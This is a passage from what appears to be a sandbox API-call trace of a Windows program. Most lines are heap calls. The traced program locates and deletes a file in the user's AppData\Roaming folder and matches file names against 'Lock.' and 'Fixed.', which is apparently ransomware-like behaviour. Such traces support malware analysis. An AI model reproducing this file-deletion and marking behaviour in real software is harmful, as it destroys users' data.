returned 1 [0200.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0200.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0200.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0200.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0200.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0200.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0200.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.496] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0200.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0200.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0200.496] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0200.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0200.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa260 [0200.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.497] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0200.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0200.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0200.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0200.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0200.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0200.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0200.498] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/jOF28qdC.m4a", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jOF28qdC.m4a", lpFilePart=0x8bedfc*="jOF28qdC.m4a") returned 0x3a [0200.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0200.499] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jOF28qdC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jof28qdc.m4a")) returned 0x2020 [0200.499] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jOF28qdC.m4a", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cb5d5a0, ftCreationTime.dwHighDateTime=0x1d4d4f6, ftLastAccessTime.dwLowDateTime=0x10645790, ftLastAccessTime.dwHighDateTime=0x1d4d174, ftLastWriteTime.dwLowDateTime=0x10645790, ftLastWriteTime.dwHighDateTime=0x1d4d174, nFileSizeHigh=0x0, nFileSizeLow=0x131aa, dwReserved0=0xc66, dwReserved1=0x4, cFileName="jOF28qdC.m4a", cAlternateFileName="")) returned 0xaa5860 [0200.499] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jOF28qdC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jof28qdc.m4a")) returned 1 [0200.500] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cb5d5a0, ftCreationTime.dwHighDateTime=0x1d4d4f6, ftLastAccessTime.dwLowDateTime=0x10645790, ftLastAccessTime.dwHighDateTime=0x1d4d174, ftLastWriteTime.dwLowDateTime=0x10645790, ftLastWriteTime.dwHighDateTime=0x1d4d174, nFileSizeHigh=0x0, nFileSizeLow=0x131aa, dwReserved0=0xc66, dwReserved1=0x4, cFileName="jOF28qdC.m4a", cAlternateFileName="")) returned 0 [0200.501] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0200.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.501] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0200.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0200.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0200.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0200.502] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa260 [0200.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0200.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0200.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.502] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0200.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0200.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0200.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0200.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0200.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0200.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0200.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0200.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0200.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0200.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0200.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0200.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/jOF28qdC.m4a", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jOF28qdC.m4a", lpFilePart=0x8bf658*="jOF28qdC.m4a") returned 0x3a [0200.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0200.506] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jOF28qdC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jof28qdc.m4a")) returned 0xffffffff [0200.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.506] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0200.506] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.506] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0200.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0200.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0200.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0200.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0200.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k3zAUT-8EHVGD9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3zAUT-8EHVGD9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zAUT-8EHVGD9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AUT-8EHVGD9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UT-8EHVGD9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T-8EHVGD9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-8EHVGD9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8EHVGD9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EHVGD9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HVGD9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VGD9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GD9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wmf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mf.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.509] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0200.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0200.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k3zAUT-8EHVGD9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3zAUT-8EHVGD9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zAUT-8EHVGD9wmf.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) 